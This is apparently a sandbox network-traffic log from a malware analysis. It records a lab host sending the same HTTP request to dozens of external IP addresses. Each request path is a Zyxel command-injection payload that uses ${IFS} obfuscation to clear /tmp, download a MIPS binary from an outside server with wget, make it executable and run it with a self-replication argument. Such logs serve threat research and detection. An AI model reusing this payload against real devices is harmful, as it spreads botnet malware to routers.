                                                  Jan 19, 2024 18:23:51.979767084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3477192.168.2.135307494.11.25.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.979804993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3478192.168.2.1342764159.247.194.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.979835987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3479192.168.2.134070262.200.15.13443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.979872942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3480192.168.2.1354308195.244.35.126443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.979908943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3481192.168.2.1351096153.114.113.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.979949951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3482192.168.2.133482092.178.105.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.980004072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3483192.168.2.1348224136.11.229.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.980041027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3484192.168.2.133634282.250.209.31443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.980078936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3485192.168.2.134740487.250.156.140443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.980133057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3486192.168.2.1338514130.21.95.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.980176926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3487192.168.2.1332830165.225.64.124443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.980216026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3488192.168.2.133322223.26.106.107443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.980232000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3489192.168.2.134285050.121.177.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.980253935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3490192.168.2.134807661.86.136.201443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.980300903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3491192.168.2.1353836219.19.124.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.980314016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3492192.168.2.134774869.47.249.188443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.980365038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3493192.168.2.1351374163.145.166.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.980393887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3494192.168.2.1337858212.144.89.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.980449915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3495192.168.2.135452440.149.74.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.980504990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3496192.168.2.13483249.112.212.91443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.980544090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3497192.168.2.1357406170.227.66.7443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.980592012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3498192.168.2.1355878175.220.54.37443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.980628967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3499192.168.2.1342286105.115.119.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.980674028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3500192.168.2.1344936149.5.252.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.980699062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3501192.168.2.134942619.9.155.195443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.980739117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3502192.168.2.1350074199.116.211.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.980765104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3503192.168.2.133998657.227.22.118443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.980820894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3504192.168.2.1356838196.172.81.47443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.980842113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3505192.168.2.1360800217.119.45.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.980865955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3506192.168.2.1348898176.117.103.225443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.980885029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3507192.168.2.1336816104.240.134.121443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.980937004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3508192.168.2.135395288.160.46.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.980963945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3509192.168.2.134695267.144.70.245443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.981015921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3510192.168.2.1343080125.202.104.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.981061935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3511192.168.2.1341828177.133.57.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.981089115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3512192.168.2.134612443.171.116.189443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.981136084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3513192.168.2.134456643.160.156.182443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.981170893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3514192.168.2.1337330163.230.194.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.981219053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3515192.168.2.1358720121.190.213.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.981246948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3516192.168.2.134770658.63.149.2443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.981282949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3517192.168.2.1349682123.246.253.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.981324911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3518192.168.2.1354006170.73.119.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.981347084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3519192.168.2.134434477.197.63.169443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.981384993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3520192.168.2.1350292199.136.85.187443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.981404066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3521192.168.2.1332790146.185.94.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.981458902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3522192.168.2.1352972202.169.18.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.981489897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3523192.168.2.1349740143.27.56.249443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.981543064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3524192.168.2.1345132134.121.127.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.981616020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3525192.168.2.135923866.14.20.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.981646061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3526192.168.2.134355670.113.94.244443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.981697083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3527192.168.2.1353372212.164.152.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.981731892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3528192.168.2.134720014.41.150.33443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.981754065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3529192.168.2.134123844.198.149.179443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.981789112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3530192.168.2.133434473.98.150.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.981853008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3531192.168.2.133409890.103.53.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.981884003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3532192.168.2.135563290.228.192.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.981913090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3533192.168.2.133768842.40.209.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.981967926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3534192.168.2.1339136105.181.66.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.981991053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3535192.168.2.13342281.245.227.191443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.982031107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3536192.168.2.135893252.176.204.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.982095003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3537192.168.2.133605436.175.90.26443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.982110977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3538192.168.2.1334786189.102.82.74443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:51.982172966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  3539192.168.2.135182492.225.110.187443
                                                  TimestampBytes transferredDirectionData
